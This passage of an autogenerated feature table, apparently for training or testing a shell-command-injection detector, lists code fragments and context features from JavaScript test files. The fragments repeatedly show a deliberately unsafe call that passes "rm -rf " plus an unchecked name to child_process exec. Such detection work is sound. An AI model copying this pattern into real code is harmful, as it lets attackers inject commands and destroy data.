-rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:0 | this | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:0 | this | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | module | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | module | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | require | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:1:1:1 | require | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:6 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:6 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:5:1:33 | cp = re ... ocess") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:16 | require | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:16 | require | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | require ... ocess") | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:18:1:32 | "child_process" | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:6 | module | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:6 | module | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:14 | module.exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:3:14 | module.exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:5:1 | module. ... gged.\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:5:1 | module. ... gged.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:1:5:1 | module. ... gged.\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:8:3:14 | exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:8:3:14 | exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | this | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:3:17 | this | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | exceptional return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | functio ... gged.\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | functio ... gged.\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | functio ... gged.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | functio ... gged.\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:18:5:1 | return of anonymous function | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:3:28:3:31 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:3 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:3 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:8 | cp.exec | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:5:4:8 | exec | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:5:4:8 | exec | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:6 | module | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:6 | module | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:14 | module.exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:14 | module.exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:18 | module.exports.foo | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:18 | module.exports.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:7:18 | module.exports.foo | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:9:1 | module. ... st.js\\n} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:9:1 | module. ... st.js\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:1:9:1 | module. ... st.js\\n} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:8:7:14 | exports | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:8:7:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:8:7:14 | exports | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:16:7:18 | foo | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:16:7:18 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:16:7:18 | foo | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:7:22:7:21 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| 